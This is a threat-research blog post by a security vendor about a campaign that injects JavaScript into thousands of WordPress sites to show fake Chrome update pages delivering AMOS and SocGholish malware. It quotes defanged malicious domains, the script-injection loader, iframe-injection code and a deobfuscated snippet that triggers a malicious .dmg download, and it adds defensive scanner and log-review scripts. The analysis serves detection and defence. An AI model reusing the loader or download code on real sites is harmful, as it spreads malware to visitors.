This week we identified over 10,000 WordPress sites showing fake Google Chrome browser update pages to visitors, rendered in the browser via an iframe.
The page delivers cross-platform malware, both AMOS (Atomic macOS Stealer), which targets Apple users, and SocGholish, which targets Windows users.
Both are popular, commercially available malware families that have been circulating for a while. It is generally believed that the two are distributed by different groups of attackers; this finding would contradict that.
To our knowledge, it is also the first time they have been delivered through a client-side attack. JavaScript loaded in the user's browser generates the fake page in an iframe. The attackers target outdated WordPress versions and plugins, which makes detection more difficult for websites without a client-side monitoring tool in place.
The attackers likely used a vulnerability in a WordPress plugin to deliver the malicious JavaScript. This file is currently not flagged by any threat feed vendors, and neither is the domain.
Here are two of the largest domains identified across thousands of websites:
Technical details
Using our detection engine, we found an initial suspicious third-party JS file at the following URL:
https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js
Our platform flagged this as a malicious script with high confidence because of its heavy obfuscation, which used multiple levels of encoding. This prompted further analysis, leading us to uncover a network of over 10,000 infected WordPress websites.
An example of a compromised site is available on our domain directory.
Blackshelter[.]org redirects the user to fastcloudcdn[.]com (our directory link), which hosts the malicious JavaScript.
We then identified multiple malicious scripts hosted on different domains.
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://blacksaltys[.]com/2xIsQSDP8CyeXrv78zk9FGV8lZIj9SXKVc-Mpx3O5H0" id="ms_main_script-js" defer></script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://objmapper[.]com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e" id="ucf_main_script-js" defer></script>
Several sites contain <link> elements that prefetch DNS for the malicious domains, likely to speed up the loading of the payload:
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
<link rel='dns-prefetch' href='//blacksaltys[.]com' />
<link rel='dns-prefetch' href='//objmapper[.]com' />
<link rel='dns-prefetch' href='//blackshelter[.]org' />
A self-invoking anonymous function dynamically loads an external JavaScript file:
;(function(o, q, f, e, w, j) {
  w = q.createElement(f);
  j = q.getElementsByTagName(f)[0];
  w.async = 1;
  w.src = e;
  j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);
The external script is loaded and executed dynamically. The query parameter (qbsfsc) carries the current Unix timestamp, so every request has a unique URL and caches are bypassed.
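One way to look for these indicators in a site's HTML, as an added example that is not code from the original post or from c/side: the Python script below parses a page with the standard library, undoes the `[.]` defanging used in this write-up so the same rules work on live HTML, and reports dns-prefetch links and script tags that point at the domains named here, plus inline loaders that set `.src` and build a Unix-timestamp cache-buster. That last rule is my own heuristic, not a signature from the post, and the sample HTML is constructed from the snippets above.

```python
"""Scan a page's HTML for the indicators described in the write-up above.

Added example, not code from the original post or from c/side. The domain list
comes from the post; the inline-loader heuristic is an assumption of this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains named in the post, stored refanged; subdomains match too.
IOC_DOMAINS = {
    "fastcloudcdn.com",
    "blacksaltys.com",
    "objmapper.com",
    "rednosehorse.com",
    "blackshelter.org",
}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
TIMESTAMP_RE = re.compile(r"Date\.now\(\)\s*/\s*1000")  # Unix-timestamp cache-buster


def refang(text: str) -> str:
    """Undo [.] / hxxp defanging so one rule set works on reports and live HTML."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def ioc_host(host: str):
    """Return the matching IoC domain for host (or a subdomain of it), else None."""
    host = host.lower().strip(".")
    for d in IOC_DOMAINS:
        if host == d or host.endswith("." + d):
            return d
    return None


class IocScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []       # list of (kind, value)
        self._script_src = None  # "" inside an inline <script>, the src inside an external one
        self._inline = []        # body chunks of the current inline script

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "link" and a.get("rel", "").lower() == "dns-prefetch":
            host = urlsplit(refang(a.get("href", ""))).hostname or ""
            if ioc_host(host):
                self.findings.append(("dns-prefetch", host))
        elif tag == "script":
            src = refang(a.get("src", ""))
            self._script_src, self._inline = src, []
            host = urlsplit(src).hostname or ""
            if ioc_host(host):
                self.findings.append(("external-script", host))

    def handle_data(self, data):
        if self._script_src == "":  # only collect inline script bodies
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        text = refang("".join(self._inline))
        for host in HOST_RE.findall(text):
            if ioc_host(host):
                self.findings.append(("inline-script-ioc", host.lower()))
        if ".src" in text and TIMESTAMP_RE.search(text):
            # Heuristic: dynamic loader that sets .src and appends a timestamp cache-buster.
            self.findings.append(("inline-loader-cachebuster", text.strip()[:60]))
        self._script_src, self._inline = None, []


def scan(html: str):
    """Return the list of (kind, value) findings for one HTML document."""
    p = IocScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: the post's snippets plus two benign resources.
SAMPLE_HTML = """<html><head>
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
<link rel='dns-prefetch' href='//fonts.gstatic.com' />
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://blacksaltys[.]com/2xIsQSDP8CyeXrv78zk9FGV8lZIj9SXKVc-Mpx3O5H0" id="ms_main_script-js" defer></script>
<script src="https://example.com/wp-includes/js/jquery/jquery.min.js"></script>
</head><body>
<script>
;(function(o, q, f, e, w, j) {
  w = q.createElement(f);
  j = q.getElementsByTagName(f)[0];
  w.async = 1;
  w.src = e;
  j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, value in scan(SAMPLE_HTML):
        print(f"{kind:26} {value}")
```

Running the file prints four findings for the sample and nothing for the benign jQuery and gstatic entries. The domain rules are high-confidence matches; the cache-buster rule also fires on some legitimate analytics loaders, so treat it as a lead to review rather than a verdict.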
Observed malicious behavior
The obfuscated script executes various actions.
First, it stops all ongoing browser activity.
window.stop();
It strips attributes such as class, style, lang, id and dir from key HTML elements.
for (let at of ["class", "style", "lang", "id", "dir"]) {
  el.removeAttribute(at); // `el` is the element being stripped
}
Then it dynamically injects the iframe into the page, displaying the fake Chrome update page.
let frame = document.createElement("iframe");
frame.srcdoc = rsd; // rsd holds the decoded HTML of the fake update page
document.body.appendChild(frame);
Analysis and Findings
Our analysis revealed that the compromised websites were running outdated versions of WordPress (6.7.1) and of its plugins, which the attackers may have exploited to inject the malicious code.
We identified 27 malicious domains linked to this activity.
A few examples include:
- blacksaltys[.]com
- objmapper[.]com
- rednosehorse[.]com
- Blackshelter[.]org
The malicious script at https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js showed a detection rate of 17/96 on the VirusTotal Report.
During our analysis, we discovered that this campaign not only targets Windows but also serves malware for macOS. We successfully downloaded a .dmg file associated with the macOS malware.
macOS and Windows malware decoded
The malware file (SHA-256 274efb6bb2f95deb7c7f8192919bf690d69c3f3a441c81fe2a24284d5f274973) was flagged by 6 antivirus vendors at the time of analysis.
The following code was uncovered after multiple layers of deobfuscation. It dynamically creates a download link for the AMOS (Atomic macOS Stealer) malware file and triggers the download.
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
  </head>
  <body>
    <script>
      (async () => {
        try {
          var btn = document.createElement("a");
          btn.href = `hxxps://extendedstaybrunswick[.]com/wp-content/plugins/reset-wp/resty.php?eg=${Math.floor(Date.now() / 1000)}`;
          btn.download = "C_6.12.4.dmg";
          document.body.appendChild(btn);
          parent.postMessage("loaded", "*");
          window.addEventListener("message", function (event) {
            if (event.data == "download") {
              setTimeout(function () {
                btn.click();
              }, 100);
            }
          });
        } catch (e) { }
      })()
    </script>
  </body>
</html>
The script creates a download link pointing at the macOS malware payload, notifies the parent page via postMessage that it has loaded, and then listens for a "message" event with the value "download", which clicks the link and triggers the file download.
Here are two sources to learn more about the AMOS malware.
Additionally, here is a source to learn about the SocGholish Windows malware.
Both AMOS and SocGholish are commercially available malware and can be purchased on Telegram.
Mitigation and protection
As a first step, update your WordPress installation and its plugins; evaluate each plugin's use and remove unused ones. Search for the scripts listed above and delete them if found. Attackers usually leave a backdoor behind: find it and remove it.
If you find these scripts on your site, we strongly recommend reviewing logs from the last 90 days to identify any indicators of compromise or malicious activity.
If you have downloaded any files from the affected websites, a thorough system cleanup is recommended to mitigate potential malware infection.
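To make the log review above concrete, here is an added example (not code from the original post or from c/side) that reads a web server's combined-format access log and flags three things a dropped backdoor or payload file typically produces on a WordPress host: any .php served from wp-content/uploads, POST requests to plugin or theme PHP files not on a site-specific allowlist, and successful direct GETs of such files. The reset-wp/resty.php path is the payload location quoted earlier; the log lines, dates, IP addresses and allowlist are constructed for the example.

```python
"""Review a WordPress access log for requests that point at a dropped backdoor or payload.

Added example, not from the original post: the log lines and dates are constructed,
the allowlist is hypothetical, and the rules are heuristics to tune per site. The
reset-wp/resty.php path is the payload location quoted in the post.
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" format; only the fields used here are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Hypothetical: plugin PHP files this site legitimately serves on direct request.
KNOWN_DIRECT_PHP = {"/wp-content/plugins/example-forms/upload-handler.php"}
PLUGIN_THEME_PHP_RE = re.compile(r"^/wp-content/(plugins|themes)/.+\.php$")


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    e["file"] = e["path"].split("?", 1)[0]  # request path without the query string
    return e


def classify(e):
    """Return a reason if the request looks like backdoor/payload traffic, else None."""
    f = e["file"].lower()
    if f.startswith("/wp-content/uploads/") and f.endswith(".php"):
        return "php-in-uploads"  # PHP must never be served from the uploads directory
    if PLUGIN_THEME_PHP_RE.match(f) and e["file"] not in KNOWN_DIRECT_PHP:
        if e["method"] == "POST":
            return "unlisted-plugin-php-post"  # typical web-shell / backdoor usage
        if e["status"] == 200:
            return "unlisted-plugin-php-get"  # a dropped file served directly
    return None


def review(lines, since=None):
    """Return (findings, per-file summary); `since` is an optional tz-aware lower bound."""
    findings = []
    by_file = defaultdict(lambda: {"hits": 0, "ips": set(), "first_seen": None})
    for line in lines:
        e = parse_line(line)
        if e is None or (since is not None and e["ts"] < since):
            continue
        reason = classify(e)
        if reason is None:
            continue
        findings.append({"ip": e["ip"], "ts": e["ts"], "method": e["method"],
                         "path": e["path"], "reason": reason})
        s = by_file[e["file"]]
        s["hits"] += 1
        s["ips"].add(e["ip"])
        if s["first_seen"] is None or e["ts"] < s["first_seen"]:
            s["first_seen"] = e["ts"]
    return findings, dict(by_file)


# Constructed sample log (RFC 5737 test addresses, made-up dates).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2024:10:14:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2024:10:14:03 +0000] "GET /wp-content/plugins/example-forms/assets/form.js HTTP/1.1" 200 811 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Dec/2024:10:20:41 +0000] "POST /wp-content/plugins/reset-wp/resty.php HTTP/1.1" 200 33 "-" "python-requests/2.31"
198.51.100.23 - - [13/Dec/2024:02:03:10 +0000] "GET /wp-content/uploads/2024/12/wp-cache.php?p=1 HTTP/1.1" 200 512 "-" "curl/8.4"
192.0.2.55 - - [14/Dec/2024:08:00:00 +0000] "GET /wp-content/plugins/reset-wp/resty.php?eg=1734163200 HTTP/1.1" 200 1048576 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Dec/2024:08:01:00 +0000] "POST /wp-content/plugins/example-forms/upload-handler.php HTTP/1.1" 200 20 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    findings, summary = review(SAMPLE_LOG.splitlines())
    for f in findings:
        print(f'{f["ts"]:%Y-%m-%d %H:%M} {f["ip"]:15} {f["method"]:4} {f["path"]}  <- {f["reason"]}')
    for path, s in summary.items():
        print(f"{path}: {s['hits']} hit(s) from {len(s['ips'])} IP(s), first seen {s['first_seen']:%Y-%m-%d}")
```

The per-file summary gives the first-seen date and the set of client IPs for each flagged path, which is what you need to scope the compromise window and to check whether the same clients touched other files. Pass a timezone-aware `since` to limit the review to the last 90 days, and extend KNOWN_DIRECT_PHP with the plugin endpoints your site genuinely exposes so they stop appearing as findings.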
c/side can spot, alert on and block client-side attacks like these thanks to our advanced detection engine and proxy. This attack would’ve been spotted and blocked with c/side installed, protecting unsuspecting users from the malware download.
This attack underscores the importance of securing the web supply chain and maintaining updated software. Based on our analysis, we recommend the following:
You can start with c/side for free or contact us.
Full list of infected websites
Find safe links to the PublicWWW pages of the infected domains: